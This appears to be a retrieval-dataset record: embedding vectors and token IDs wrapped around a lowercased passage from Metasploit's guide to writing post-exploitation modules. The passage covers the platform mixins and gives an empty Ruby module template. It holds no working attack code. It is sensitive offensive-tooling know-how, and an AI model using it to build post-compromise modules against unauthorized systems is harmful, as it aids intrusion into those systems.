1.1213932037353516, -0.15859799087047577, -0.5330859422683716, 0.05362852290272713, -0.39059215784072876, -0.270144522190094, -0.5254670977592468, 0.5751985311508179, -0.9962902665138245, 0.2633027732372284, -0.1967916190624237, 0.32819288969039917, 0.6284160017967224, -0.014542948454618454, -0.7085261344909668, -0.850217878818512, -0.24293898046016693, 0.6333569288253784, -0.9353414177894592, 0.1864190399646759, -0.09421313554048538, 0.7139983773231506, -0.1873348206281662, 1.0475300550460815, 0.1035335585474968, -0.5176622867584229, 0.2822531461715698, 0.630638599395752, -0.07773768156766891, -0.42383185029029846, 0.3484918773174286, 0.5909638404846191, 0.12276564538478851, 0.6299331188201904, 0.5494574308395386, 0.6918292045593262, -0.045271605253219604, -0.44081100821495056, 0.36327847838401794, 1.1390610933303833, -0.0012390988413244486, 0.8838715553283691, 1.1012009382247925, -0.13119851052761078, -0.6630664467811584, -0.7992249131202698, 0.8258345723152161, 0.8653411269187927, -0.8964055180549622, -1.2361574172973633, 0.12948131561279297, 0.056347187608480453, -0.7046529650688171, -0.2578904628753662, 0.5073134303092957, 0.6637447476387024, -0.000008658196748001501, 0.16819438338279724, 0.027778686955571175, -0.7059668898582458, -0.3227636218070984, -0.21528182923793793, -0.8613681793212891, -0.3946624994277954, -0.4132753312587738, -0.4389275908470154, 0.1552371382713318, -0.18705393373966217, 0.7793996930122375, -0.1815357208251953, -0.36043569445610046, 0.08748310804367065, -0.06746763736009598, 0.6253686547279358, 0.16736900806427002, -0.6599331498146057, -1.141359806060791, 0.17424991726875305, -0.4897424876689911, 1.0081400871276855, 0.2463519126176834, -0.7141773104667664, -0.4767158627510071, 0.1500672847032547, 0.038713619112968445, 0.44335490465164185, 0.6877243518829346, 0.36978432536125183, -0.10236095637083054, 0.2582871913909912, 0.7059359550476074, -0.25160446763038635, 0.6159585118293762, 0.02710605040192604, -0.2830185890197754, 0.5651975870132446, -0.05100871995091438, 0.4976080060005188, 0.5018106698989868, 0.5277639031410217, -1.3461613655090332, 0.2504012882709503, -0.5762726068496704, 0.6004701852798462, -0.7671886086463928, 0.681948184967041, 0.19459882378578186, -0.33405351638793945, 0.5133070945739746, -0.2886967957019806, -0.17095068097114563, 0.1238085925579071, -0.0007175656501203775, -0.22448056936264038, -0.3513687252998352, 0.8305338025093079, 0.3271118402481079, -0.3868596851825714, 0.21818757057189941, -0.7907885909080505, -0.4159889817237854, 0.12462861835956573, -0.22856415808200836, 0.08633118122816086, -0.4293733835220337, 0.6761093139648438, -0.3200165629386902, -0.5733952522277832, 0.4475904703140259, 0.1352866142988205, -0.47652438282966614, -0.3526448607444763, 0.12019960582256317, -0.10377699881792068, -0.4367446005344391, 0.5640015006065369, 0.40302255749702454, -1.2370684146881104, -0.0887771025300026, -0.226151704788208, -0.06961645185947418, 0.4321579933166504, 0.25424259901046753, 0.28693848848342896, -0.3000490367412567, 0.9782598614692688, -0.5177748799324036, -0.2942112684249878, 0.4628114402294159, -0.3834708333015442, 0.3165595233440399, -0.5450739860534668, -0.5337674617767334, -0.20492079854011536, -0.4767859876155853, -0.7251225113868713, 0.4029600918292999, 0.42808592319488525, 0.2738027572631836, -0.4409111440181732, 0.5894270539283752, 0.011404582299292088, 0.13729682564735413, 0.13170881569385529, -0.3477106988430023, -0.8766515254974365, 0.45411574840545654, 0.14924177527427673, 0.4464821219444275, -0.28009316325187683, 0.7192250490188599, 0.027271371334791183, -0.6111027598381042, 0.16307269036769867, 0.06798934191465378, -0.05678485333919525, -0.8383116722106934, -0.4904148280620575, 0.36087164282798767, -0.1237102672457695, 0.028538376092910767, -0.006519593298435211, 0.21362468600273132, -0.7485062479972839, -0.7586139440536499, -0.4223077893257141, 1.375476360321045, 0.778756856918335, 0.6322246789932251, 0.8238821625709534, 1.0013113021850586, 0.08226402848958969, -0.30418699979782104, 0.5606826543807983, -0.11059799790382385, 0.24310684204101562, -0.22251228988170624, 0.822593629360199, -0.34043267369270325, -0.1717318445444107, -0.3223588764667511, 0.1565515697002411, -0.3418589234352112, 0.42347803711891174, 0.29615548253059387, 0.04066416621208191, -0.941596508026123, -0.5151718258857727, -0.3105442225933075, 0.1567213088274002, -0.6048901677131653, -0.38459205627441406, -0.14842572808265686, 0.45099449157714844, 0.30128616094589233, -0.5083519220352173, -0.20992052555084229, -0.2315303534269333, 0.19747410714626312, 0.48083627223968506, -0.4570721387863159, -0.7812572717666626, -0.4528898000717163, -0.22939971089363098, -1.0091444253921509, 0.19784770905971527, 0.5374239683151245, 0.363363653421402, -0.23411302268505096, -0.736589789390564, -0.27513501048088074, 0.236207515001297, -0.12842777371406555, -0.2671854496002197, -0.19850116968154907, 0.6645766496658325, -0.27984005212783813, 0.21074709296226501, -0.44167593121528625, -0.4642471969127655, 0.3340938091278076, -0.607387900352478, 0.7224975228309631, -0.2888324558734894, 0.2969284653663635, 0.36319583654403687, -0.2616133391857147, 0.5117982029914856, 0.3880842328071594, 0.03614865243434906, 0.13774865865707397, -0.6517947912216187, 0.7543584108352661, -0.41838160157203674, -0.00928544718772173, 0.39305317401885986, 0.0764971375465393, 0.026224585250020027, 0.29071325063705444, 0.15264476835727692, -0.5015885233879089, 0.1568489521741867, -0.09599615633487701, -0.46314823627471924, 0.7744831442832947, -0.2852897047996521, 0.4922937750816345, 0.2805008292198181, -0.00740221980959177, 0.07713022828102112, -0.7294056415557861, 0.6996213793754578, -0.045609645545482635, 0.868671178817749, -0.4359624981880188, -0.20722436904907227, 0.15590372681617737, 0.21184369921684265, 0.3279454708099365, 0.522723913192749, 0.47998759150505066, -0.45089203119277954, -0.3623422682285309, -0.30967479944229126, -0.8412753939628601, -0.36195775866508484, 0.22636936604976654, -0.4627864956855774, -0.2869763672351837, -0.24947665631771088, 0.5258865356445312, -0.1235247403383255, -0.1422797292470932, -0.11651287227869034, 0.045059043914079666, 0.24167512357234955, -0.6376307010650635, 0.3904024660587311, -0.8538101315498352, 0.01566769741475582, -0.1913551688194275, 0.2958400845527649, 0.2969542443752289, 0.4832216203212738, -0.31108930706977844, 0.31855306029319763, 0.9449660181999207, -0.3803313672542572, -0.2734575867652893, 0.32608312368392944, 0.1331518441438675, -0.8129229545593262, 0.5311928987503052, 0.32842153310775757, -0.07805172353982925, 0.045984528958797455, -0.45306918025016785, -0.26647642254829407, -0.2592530846595764, -1.032645344734192, 0.054506901651620865, -0.21807381510734558, 0.08427657186985016, -0.9698864221572876, -0.9063192009925842, -0.5230827927589417, 0.38765114545822144, 0.21638357639312744, -0.8582433462142944, 0.09041740000247955, 0.04103032872080803, 0.5544003248214722, -0.08866343647241592, -0.018105100840330124, -0.38465699553489685, -0.15656441450119019, -0.24094678461551666, 0.3036247491836548, -0.26835134625434875, 0.321513831615448, -0.11899019032716751, -0.27914631366729736, 0.14919309318065643, -0.2066054493188858, -1.3236514329910278, -0.27013716101646423, -0.3307441771030426, -0.1887580156326294, 0.09981099516153336, 0.6527409553527832, 0.023597437888383865, 0.4976356029510498, 0.25245216488838196, 0.4988402724266052, -0.3142636716365814, 0.049704764038324356, -0.6102308034896851, -0.23935618996620178, 0.765347957611084, -0.7526575922966003, 0.030343659222126007, 0.20054121315479279, 0.9995473027229309, 0.25597745180130005, -0.04165230691432953, -0.8313509225845337, 0.3147308826446533, -0.8049615025520325, -1.1075568199157715, 0.5925204753875732, -0.1713528037071228, 0.07723187655210495, 0.09847854822874069, 0.13320140540599823, 0.43176794052124023, -0.4674810469150543, -0.24028487503528595, 0.820496141910553, 0.11701022833585739, 0.7058574557304382, -0.790464460849762, 0.7589631676673889, 0.8245209455490112, 0.11286294460296631, 0.2026861310005188, -0.24129532277584076, -0.06330769509077072, -0.13157179951667786, -0.33940985798835754, -0.2800968289375305, -0.4665188491344452, -0.30592358112335205, 0.8716023564338684, -0.33792224526405334, 0.33754852414131165, 0.11176280677318573, -0.8879705667495728, -0.11526545882225037, -0.17927642166614532, -0.15918612480163574, 0.1650860756635666, 0.6277144551277161, 0.2822791039943695, 0.6372899413108826, -0.9752763509750366, 0.24228425323963165, -0.4593459367752075, -0.1391349881887436, 0.6099458336830139, 0.12454937398433685, -0.05877871438860893, 0.7975262999534607, -0.03562129661440849, -0.7679956555366516, -0.18597346544265747, -0.9767640829086304, -0.008462406694889069, -0.29758527874946594, -1.0982320308685303, -0.4360669255256653, -0.7914669513702393, -0.3323446810245514, -0.3782951831817627, 0.8177015781402588, 0.15066659450531006, 0.1880292296409607, -0.8445149064064026, 0.07588469982147217, -0.13929343223571777, 0.9335837364196777, 0.37368789315223694, -0.5979043841362, -0.3614300787448883, -0.9274647831916809, 0.22858643531799316, 0.6762872338294983, 0.26154351234436035, 0.6859983205795288, -0.055604368448257446, 0.481552392244339, 0.2775317132472992, 0.03598465025424957, 0.8167834877967834, -0.018522998318076134, 0.259164422750473, 0.5043337345123291, -0.144459068775177, -0.7813013195991516, -0.8301703333854675, 0.4668864905834198, 0.1407756507396698, 0.6368557810783386, -0.575735867023468, -0.007503615692257881, -0.32361268997192383, 0.39795127511024475, 0.3148197531700134, -1.030490756034851, -0.3204694390296936, -1.0534054040908813, 0.09162995219230652, -0.38059478998184204, 0.7013842463493347, -0.19605962932109833, 0.5236765146255493, -0.6134148836135864, -0.017025889828801155, -0.47089794278144836, -0.25075802206993103, -0.14629784226417542, 0.010729651898145676, -0.23802417516708374, 0.6210426688194275, -0.3452816903591156, -0.08643874526023865, 0.19393333792686462, -0.03801444172859192, -0.3288651406764984, -0.716834545135498, 0.171036496758461, 0.03152398765087128, -0.5139033794403076, -0.1605810821056366, -0.7163459062576294, -0.10221836715936661, 0.014389922842383385, -0.22687025368213654, 0.5322740077972412, 0.5632047057151794, -0.26609548926353455, 0.24165435135364532, 0.011247500777244568, 0.12700273096561432, 0.628585934638977, -0.5853358507156372, -0.126139298081398, 0.12170738726854324, -0.6195873022079468, 0.6223993897438049, 0.29905182123184204, -0.23334109783172607, 0.6347494125366211, 0.06583984196186066, -0.930212676525116, 0.03617561236023903, -0.5334746241569519, -0.15620090067386627, 0.5554520487785339, -0.5194326043128967, 0.682216465473175, 0.5648510456085205, 0.2758651077747345, 0.5496612191200256, 0.095690056681633, 0.48085862398147583, 0.3945441246032715, -0.42779800295829773, 0.17178118228912354, 0.48835450410842896, -0.37538114190101624, -0.48939409852027893, -0.5761707425117493, 0.17334851622581482, -0.8496086001396179, 0.25516170263290405, -0.3835865557193756, -0.4336135685443878, -0.906596302986145, -0.42738398909568787, 0.20800712704658508, 0.5111221671104431, 0.5061724185943604, 0.1873653084039688, 0.2505921423435211, -0.4884592890739441, -0.8156255483627319, 0.03501024469733238, -0.7744339108467102, -0.055020950734615326, 0.32572242617607117, 0.1191200464963913, -0.2325889766216278, -0.5973242521286011, -0.19480618834495544, 0.13088569045066833, 0.1692352443933487, -0.0054014758206903934, 0.2717074453830719, 0.004715182818472385, -0.3607901632785797, 1.1018850803375244, -0.4839816987514496, -0.4299289286136627, -0.23942448198795319, 0.7291421890258789, -0.4696245491504669, -0.7447931170463562, 0.5679579973220825, 0.8861477971076965, 0.08989529311656952, 0.20024503767490387, -0.45883914828300476, 0.4949514865875244, -0.1565791219472885, 0.04209533706307411, 0.4508383572101593, -0.15546832978725433, -0.3496166467666626, 0.15942689776420593, -0.5511230826377869, -0.009837698191404343, -0.39445048570632935, -0.17232371866703033, 0.17352358996868134, 0.23398169875144958, -0.5632590651512146, 0.548352837562561, -0.24288146197795868, -0.4293864071369171, 0.5440133213996887, 0.6546218991279602, 0.7415006756782532, -0.3888687789440155, 0.1045926883816719, -0.5164501070976257, 0.5787983536720276, -0.06374936550855637, 0.6232732534408569, -0.20008814334869385, 0.3172442317008972, 0.679354190826416, -0.5628002882003784, 0.24374723434448242, 0.6400045156478882, 0.40758323669433594, -0.8624186515808105, 0.16514351963996887, 0.03105369582772255, 0.4045093357563019, 0.03246869519352913, -0.1269150972366333, 0.3431053161621094, 0.7542663812637329, 0.027371400967240334, 0.013430090621113777, -0.3796151876449585, 0.5028753280639648, -0.18606936931610107, 0.662298858165741, -0.583986222743988, 0.16276505589485168, 0.12554998695850372, 0.20022131502628326, 0.11511120945215225, 0.4087747633457184, 1.0995283126831055, -0.063765749335289, 0.057124070823192596, 0.0719757005572319, -0.3188839256763458, 0.02867419272661209, 1.0054181814193726, -0.21990101039409637, -0.5786945819854736, 0.16765683889389038, -0.26249226927757263, -0.19542311131954193, -1.0242295265197754, 0.06247439980506897, -0.14477217197418213, 0.07575276494026184, 0.23920147120952606, -0.766049325466156, 0.5015246272087097, -0.2240196168422699, 0.8774465918540955, -0.525402843952179, 0.3499716520309448, 0.20133940875530243, 0.06432216614484787, -0.05321778729557991, 1.4083638191223145, -0.17268188297748566, 0.556725025177002, -0.097112275660038, 1.0438687801361084, -0.04653649404644966, -0.1398213803768158, -0.1591227501630783, -0.3795551657676697, -0.7168053984642029, 0.22388902306556702, -0.1793602555990219, -0.24319994449615479, -0.3178616464138031, -0.35165175795555115, 0.78302401304245, -0.47419923543930054, -0.23309393227100372, -0.6607183218002319, 0.14027167856693268, -0.5457544922828674, -0.6693037748336792, 0.7354301810264587, -0.19962549209594727, -0.6969808340072632, 0.0588109977543354, -0.1368582844734192, 0.12551021575927734, 0.3054465055465698, -0.38491562008857727, -0.5317922234535217, -0.6854472756385803, -0.4844242334365845, -0.7903872728347778, 0.32049182057380676, 0.36125823855400085, -0.31487151980400085, -0.10713613033294678, -0.5789962410926819, -0.6047785878181458, -0.10161788761615753, -0.24596638977527618, 0.14143508672714233, 0.7254454493522644, 0.22600658237934113, 0.3274335265159607, 0.30397069454193115, -0.47881489992141724, -0.14444774389266968, 0.26245012879371643, 0.7050874829292297, -0.27459952235221863, 0.6724690794944763, 0.5069853663444519, -0.6212771534919739, -0.2774827480316162, 0.07762612402439117, 0.4856509566307068, 0.21373265981674194, 0.01586439646780491, 0.14295674860477448, 0.0010778572177514434, -0.6420912742614746, -0.1927970051765442, -0.09840721637010574, -0.2250487059354782, -0.16644807159900665, -0.04077195003628731, -1.1263298988342285, -0.12996412813663483, -0.6258807182312012, -0.025609932839870453, -0.21990643441677094, 0.6590163707733154, 0.5561481714248657, -0.06174654886126518, 0.4408622682094574, -1.0163459777832031, 4.351033687591553, 0.1677374541759491, 0.116449736058712, -0.30506816506385803, 0.14097778499126434, 1.2510881423950195, 1.0901817083358765, -0.22147421538829803, 0.7414296269416809, -0.808298647403717, 0.23441822826862335, -0.1504591703414917, 0.11512607336044312, -0.1690690964460373, 0.47493040561676025, 0.9559210538864136, -0.3698905408382416, 0.44512510299682617, 0.3844282627105713, -0.9047089219093323, -1.3841627836227417, 0.32527780532836914, -0.8458380103111267, 1.0057377815246582, 0.24603170156478882, 0.2677559554576874, 0.6106481552124023, -0.9104021787643433, 0.7343103289604187, -0.2859177887439728, -0.07011678814888, -0.4424877464771271, -0.5093555450439453, -0.3389616310596466, -0.5698738098144531, 0.09823682904243469, -0.3156358301639557, -0.35843685269355774, -0.5104715824127197, -0.1541365087032318, 0.6176655292510986, -0.20962049067020416, 0.6411773562431335, -0.08230222761631012, 0.01801391877233982, 0.7263618111610413, -0.11282002925872803, 0.43788424134254456, 0.25262120366096497, -0.5876619219779968, 0.6805978417396545, -0.3280491530895233, 0.7806171178817749, -0.10873687267303467, -0.8415033221244812, 0.13972800970077515, 0.1573908030986786, -0.36405515670776367, -0.1718766987323761, -0.7909422516822815, 0.6438459157943726, -0.19244854152202606, 0.1189488098025322, -0.47057199478149414, -0.23921824991703033, 0.6973558664321899, -0.7342358827590942, 0.08769411593675613, 0.04911428689956665, 0.06676789373159409, -0.45936262607574463, 0.4845338463783264, 0.07525182515382767, -0.9103462100028992, 0.7735183238983154, -0.3754435181617737, -0.5748117566108704, 0.22896550595760345, 1.0150293111801147, -0.13452422618865967, -0.6830150485038757, -0.4895981252193451, -0.8000332713127136, 0.39090079069137573, 0.8400095701217651, 0.4827369153499603, -0.2974914312362671, -0.8447176814079285, 0.061588823795318604, 0.3795422613620758, 0.12920191884040833, 0.5880538821220398, -0.0526747852563858, -0.11946044117212296, -0.301247775554657 ]
[ 1008, 1033, 3225, 20868, 2497, 5806, 1031, 1008, 1033, 1996, 1005, 7396, 1005, 8023, 4324, 1996, 8316, 28139, 3334, 7396, 1028, 1028, 5219, 1012, 2465, 1027, 1028, 5796, 2546, 1024, 1024, 6521, 1024, 1024, 8316, 28139, 3334, 1035, 1060, 20842, 1035, 2663, 2012, 2023, 2391, 2017, 2031, 1996, 2373, 2000, 3627, 2068, 2035, 1012, 2021, 5060, 2008, 1996, 2682, 2742, 2003, 1037, 5796, 2546, 1024, 1024, 6521, 1024, 1024, 8316, 28139, 3334, 1035, 1060, 20842, 1035, 2663, 4874, 1012, 2045, 2024, 2941, 2195, 2062, 2367, 3924, 1024, 3094, 1035, 5806, 1012, 21144, 1010, 8316, 28139, 3334, 1035, 25718, 1012, 21144, 1010, 8316, 28139, 3334, 1035, 9262, 1012, 21144, 1010, 8316, 28139, 3334, 1035, 1060, 20842, 1035, 11603, 1012, 21144, 1010, 4385, 1012, 2169, 16582, 2015, 11543, 2061, 2009, 1521, 1055, 2941, 2785, 1997, 3697, 2000, 4863, 2068, 2035, 1010, 2021, 2027, 2024, 4225, 1999, 1996, 5622, 2497, 1013, 5796, 2546, 1013, 2918, 1013, 6521, 1013, 14176, 2061, 2017, 2064, 2156, 2129, 2027, 2147, 1012, 2030, 2017, 2064, 2377, 2007, 2028, 2144, 2017, 1521, 2128, 2525, 1999, 1996, 20868, 2497, 25732, 1012, 1999, 10090, 1010, 2045, 2024, 2048, 4874, 4725, 2008, 2024, 18801, 2005, 2139, 8569, 12588, 5682, 1012, 1996, 2034, 2003, 4725, 1010, 2029, 2097, 2862, 2035, 1996, 2270, 1998, 5123, 4725, 2013, 2008, 4874, 1024, 5219, 1012, 4725, 1996, 2060, 2028, 2003, 22459, 1010, 2029, 5651, 1037, 5164, 1997, 1037, 2529, 1011, 3191, 3085, 6630, 1997, 1996, 4874, 1024, 5219, 1012, 22459, 2028, 4141, 2109, 4118, 1997, 1996, 5219, 4874, 2003, 1996, 4132, 4118, 1012, 2005, 2742, 1010, 2065, 2017, 1521, 2128, 3015, 1037, 2695, 11336, 2005, 1037, 3645, 18077, 1010, 1999, 1996, 4638, 4118, 2017, 1521, 2222, 3497, 2215, 2000, 2224, 5219, 1012, 4132, 2000, 5676, 1996, 4539, 5219, 2003, 5360, 1024, 4983, 5219, 1012, 4132, 1027, 1027, 1005, 3645, 1005, 1001, 2512, 1011, 3645, 3001, 2024, 5791, 2025, 5360, 1012, 2709, 18077, 1024, 1024, 4638, 16044, 1024, 1024, 3647, 2203, 2017, 2064, 2036, 2298, 2012, 2060, 2783, 2695, 14184, 1998, 2156, 2129, 2027, 2224, 2037, 5219, 4874, 1012, 1996, 5796, 2546, 1024, 1024, 2695, 4666, 15227, 2057, 4541, 1010, 2087, 2695, 11336, 4666, 7076, 2024, 2328, 2006, 2327, 1997, 1996, 5219, 4874, 1010, 1998, 2045, 2024, 2116, 2041, 2045, 1012, 2174, 1010, 2045, 2003, 1037, 2364, 2028, 2017, 5525, 3685, 2444, 2302, 1024, 1996, 5796, 2546, 1024, 1024, 2695, 4666, 2378, 1012, 2043, 2017, 3443, 1037, 2695, 11336, 2007, 2023, 4666, 2378, 1010, 1037, 2843, 1997, 2060, 4666, 7076, 2024, 2036, 2525, 2443, 2005, 2035, 7957, 1997, 16820, 1010, 2000, 2022, 2062, 3563, 1024, 5796, 2546, 1013, 4563, 1013, 2695, 1013, 2691, 1011, 2691, 4725, 2695, 14184, 2224, 1010, 2005, 2742, 1024, 4642, 2094, 1035, 4654, 8586, 1012, 5796, 2546, 1013, 4563, 1013, 2695, 1035, 4666, 2378, 1011, 7906, 2650, 1997, 1996, 5219, 2110, 1012, 5796, 2546, 1013, 4563, 1013, 2695, 1013, 5371, 1011, 5371, 2291, 3141, 4725, 1012, 5796, 2546, 1013, 4563, 1013, 2695, 1013, 4773, 5339, 2278, 1011, 3594, 4773, 5339, 2278, 2000, 11835, 2007, 1996, 4539, 3698, 1521, 1055, 4773, 28727, 1012, 5796, 2546, 1013, 4563 ]
metasploit
111.txt
2
/ post / linux - there actually isn ’ t a lot going on, just get _ sysinfo and is _ root? specifically for linux. msf / core / post / osx - get _ sysinfo, get _ users, get _ system _ accounts, get _ groups, and methods for operating the target machine ’ s webcam. msf / core / post / solaris - pretty much like the linux mixin. same methods, but for solaris. msf / core / post / unix - get _ users, get _ groups, enum _ user _ directoriesmsf / core / post / windows - most of the development time are spent here. from windows account management, event log, file info, railgun, ldap, netapi, powershell, registry, wmic, services, etc. templatehere we have a post module template. as you can see, there are some required fields that need to be filled. we ’ ll explain each : # # # this module requires metasploit : url # current source : url # # class metasploitmodule < msf : : post def initialize ( info = { } ) super ( update _ info ( info,'name'= >'[ platform ] [ module category ] [ software ] [ function ] ','description'= > % q { say something that the user might want to know. },'license'= > msf _ license,'author'= > ['name'],'platform'= > ['win ','linux ','osx ','unix ','bsd ','solaris'],'sessiontypes'= > ['meterpreter ','shell'] ) ) end def run # main method end end the name field should begin with a platform, such as : multi, windows, linux, os x, etc. followed by the module ’ s category, such as : gather, manage, recon, capture, wlan. followed by the name of the software, and then finally a few words that describe the functionality of the module. a naming example : β€œ multi gather rndftp credential enumeration ”. the description field should explain what the module does, things to watch out for, specific requirements, the more the better. the goal is to let the user understand what he ’ s using without the need to actually read the module
[ 0.015476956032216549, -0.21731403470039368, -0.09050528705120087, 0.3913084864616394, -0.8604088425636292, 0.08342698961496353, -0.30813291668891907, 0.18972574174404144, 0.4000948369503021, 0.6794305443763733, 0.1946527510881424, 0.11786800622940063, 0.09920740127563477, -0.46023714542388916, -0.6962212324142456, -0.02216404303908348, 0.055495746433734894, 0.27689406275749207, -0.6207641959190369, -0.4902779757976532, 0.10408395528793335, -0.07029172033071518, -0.9287773966789246, -0.35816502571105957, -0.9692659378051758, 0.17764370143413544, 1.1043323278427124, 0.28399085998535156, 0.5299437046051025, 0.4971553385257721, 0.23843929171562195, 0.17228882014751434, 0.10034576058387756, -0.6725049614906311, -0.1690523326396942, -0.010355595499277115, 0.8046079874038696, -1.1595840454101562, 0.20788392424583435, -0.5312333106994629, 0.44025716185569763, -0.06640834361314774, 0.26304563879966736, -0.6662365794181824, -0.5456243753433228, -0.3919673562049866, 0.34955668449401855, -0.3661257326602936, 1.2100650072097778, -0.593230128288269, 0.41538602113723755, 0.716762363910675, -0.630677342414856, 0.1071944385766983, 0.7513781189918518, 0.23512090742588043, 0.08844933658838272, 0.34113216400146484, -0.26803016662597656, 0.4751513600349426, -0.21566593647003174, 0.7130233645439148, -0.12160950154066086, -0.5517507195472717, -0.09440537542104721, 0.5099222660064697, -0.10922466963529587, -0.24827814102172852, 0.02944537252187729, -0.7047569751739502, 0.47858232259750366, 0.7645623683929443, -0.39261963963508606, -0.20959791541099548, -0.26141518354415894, -0.19567179679870605, 0.1485656201839447, 0.07928618043661118, -0.7057963013648987, 0.40695202350616455, -0.04592859372496605, 0.20037853717803955, 0.08074457198381424, -0.41233938932418823, 0.03480761870741844, -0.44679954648017883, 0.7536154389381409, 0.8139519095420837, -0.727294921875, 0.12161970883607864, 0.8550372123718262, 0.3705207407474518, -0.14769591391086578, -0.35956069827079773, 0.668816328048706, 0.7170440554618835, -0.610397458076477, -0.036154963076114655, 0.17959338426589966, 0.3738603889942169, 0.814164400100708, -0.045441072434186935, 0.4853707253932953, 0.4438575506210327, -0.1404167264699936, 0.18065857887268066, 0.10399958491325378, 0.018841976299881935, 0.48071107268333435, -0.42734286189079285, 0.43713608384132385, 0.2585834562778473, -0.1541266143321991, -0.4321039021015167, -0.7312647104263306, 0.36761173605918884, 0.3163353204727173, 0.1237119734287262, -0.5095680952072144, 0.5292143821716309, 0.12328670173883438, -1.1030018329620361, 0.11178992688655853, -0.3585578203201294, 0.18794040381908417, 0.2466258704662323, -0.3403805196285248, 0.7209966778755188, -1.2172116041183472, -0.45921000838279724, 0.1183924451470375, 0.1385696977376938, 0.008022124879062176, 0.781884491443634, 0.4337129294872284, -0.11806684732437134, -0.25292888283729553, -0.09795544296503067, 0.6413199305534363, -1.292442798614502, -0.11449520289897919, 0.47060292959213257, 0.46740269660949707, 1.2665348052978516, 0.4440154731273651, 0.22265072166919708, 0.19523592293262482, 0.49399715662002563, 0.0032977540977299213, 0.7717120051383972, -0.03812471404671669, 0.09329260885715485, 0.6342209577560425, 0.055778976529836655, -0.6424117088317871, 0.21167433261871338, -0.14846836030483246, 0.2891354560852051, -0.6243536472320557, 0.5528199672698975, -0.12225005775690079, 1.0914433002471924, -0.03780784457921982, 0.41149696707725525, -0.06073566898703575, 0.2572556436061859, -0.7719027996063232, -0.6590076088905334, -0.33178895711898804, -0.10960707068443298, 0.26700711250305176, -0.15391437709331512, 0.04167178273200989, 0.032049890607595444, 1.6447973251342773, 0.6542020440101624, -0.34477704763412476, 0.05212709680199623, -0.17927272617816925, 0.8640471696853638, -1.0833114385604858, 0.1868515908718109, -0.06808050721883774, 1.1285784244537354, -0.31016653776168823, -0.06621569395065308, -0.24246998131275177, 0.011110548861324787, -0.15641506016254425, -0.8822965621948242, -0.1412513107061386, 0.6290801167488098, -0.21890324354171753, 0.7307202219963074, 0.31423118710517883, 0.21192026138305664, -1.5475267171859741, 0.25647902488708496, -0.04733885079622269, -0.9762099981307983, -0.5740481019020081, 0.42660465836524963, -0.2415926605463028, 0.37046658992767334, -0.3842598497867584, -0.7494425177574158, 0.6115031838417053, 0.9665187001228333, -0.24734362959861755, 0.8554075360298157, 1.3755236864089966, -0.14674031734466553, -0.29837551712989807, -0.6127960085868835, -0.11935680359601974, -0.40686339139938354, -0.6147030591964722, 0.9800702929496765, -0.4494687020778656, -0.09981486201286316, -0.05843057855963707, 0.6483795642852783, 0.4766283631324768, 0.06260465830564499, -0.42567190527915955, -0.36489734053611755, 0.2960273325443268, 0.7061185836791992, -0.8697853684425354, -0.1975243240594864, -0.33302247524261475, 0.9440387487411499, 0.4827026426792145, 0.7840626835823059, 0.0950293019413948, -0.7121448516845703, 1.2706358432769775, 0.4488258361816406, -0.05823107063770294, 0.022888334468007088, 0.2729812264442444, 0.597547709941864, 0.6762361526489258, 0.5340294241905212, 0.5604735612869263, 0.23989592492580414, 0.3914163112640381, -0.553425133228302, 0.3956521451473236, 0.6573899388313293, -0.2999509274959564, 0.9432289004325867, 0.004449331201612949, -0.5472487807273865, -0.9232081174850464, -1.0816830396652222, 0.33004987239837646, 1.3672351837158203, -0.7744078636169434, -1.0324171781539917, 0.22797690331935883, 0.3494504690170288, -0.84513920545578, -0.06491488963365555, 0.045868970453739166, 0.48386746644973755, -0.15830232203006744, 0.43753185868263245, -0.22663171589374542, -0.7507480382919312, -0.26057931780815125, -0.3596173822879791, -1.248283863067627, -0.5454923510551453, -0.0947410985827446, -0.14590363204479218, -0.09766630828380585, -0.3497210443019867, 0.8876303434371948, -0.9198912382125854, -0.5563035607337952, -0.21228423714637756, 0.6624271273612976, 0.39786404371261597, -0.05242560803890228, -0.32043203711509705, -0.39701953530311584, 0.5697521567344666, 0.10177522152662277, 1.1362922191619873, -0.13478006422519684, -0.15100520849227905, -0.5088869333267212, 0.07470905035734177, -0.24852344393730164, 0.2180185765028, 0.7692216634750366, 0.48757290840148926, 0.04143664613366127, 0.06698067486286163, -0.11524966359138489, -0.21332299709320068, 0.4906821548938751, -0.4284772574901581, -0.3770063817501068, 0.19508379697799683, -0.42375051975250244, 0.30776068568229675, -0.2765597701072693, 1.1382733583450317, -1.3278388977050781, 0.9838557839393616, -0.06430066376924515, 1.2553153038024902, -1.2001352310180664, 0.8321829438209534, -0.09481815993785858, -0.24853350222110748, 0.28059205412864685, -0.5673760175704956, -0.13196809589862823, -0.0906859040260315, 0.1605430245399475, -0.9231228828430176, 0.0370541475713253, 0.39516398310661316, 0.28173187375068665, -1.2054743766784668, 0.9316367506980896, -0.3132514953613281, -0.7187355756759644, 0.32869794964790344, -0.589219868183136, 0.9935894012451172, -0.36930519342422485, 0.5408045053482056, -0.04667093604803085, -0.4002700746059418, -0.09682070463895798, 0.29179686307907104, 0.2338341623544693, -0.3252294659614563, 0.18027924001216888, 0.1899034082889557, -0.2271503210067749, 0.3787122368812561, 0.032849930226802826, -0.3670313060283661, -0.18508172035217285, -0.07655271142721176, -0.3166259825229645, 0.18605013191699982, 0.4128897190093994, 0.827482283115387, 0.22872112691402435, 0.9029719829559326, -0.290021151304245, -0.36956486105918884, 0.25809603929519653, -0.08998069912195206, 0.005480999127030373, 0.47986486554145813, 0.07354329526424408, 0.35748061537742615, -0.17728175222873688, -0.2655419111251831, 0.12049052864313126, -0.12460464239120483, 0.4332820773124695, -0.4636760950088501, 0.8135413527488708, -0.5987865328788757, 0.03885011374950409, 0.06580205261707306, -0.5868034958839417, -0.9676848649978638, 0.4278065860271454, -0.20661009848117828, 0.6714922785758972, -0.43838053941726685, 0.3365156948566437, 0.06495536863803864, -0.15429288148880005, 0.27069029211997986, -0.22620625793933868, 0.48580971360206604, -0.6424747109413147, -0.5771857500076294, -0.41655656695365906, -0.3852577209472656, 0.030560078099370003, -0.3946739733219147, -0.3228638470172882, -0.436065137386322, -0.805365800857544, -0.9761015772819519, 0.9495704174041748, 0.6837760210037231, 0.6850969195365906, 0.6872127652168274, 0.4171026945114136, -0.5814878344535828, -0.27380695939064026, 0.5847867727279663, -0.24647441506385803, 1.106776475906372, -0.30476757884025574, 1.3456840515136719, -0.34134629368782043, 0.25543105602264404, -0.23924794793128967, 0.17852476239204407, 0.09822604805231094, 0.6815919280052185, -0.27702781558036804, -0.18954701721668243, -0.16550970077514648, -0.08422505855560303, -0.04575584828853607, 0.15934091806411743, -0.6392335891723633, -0.4616123139858246, 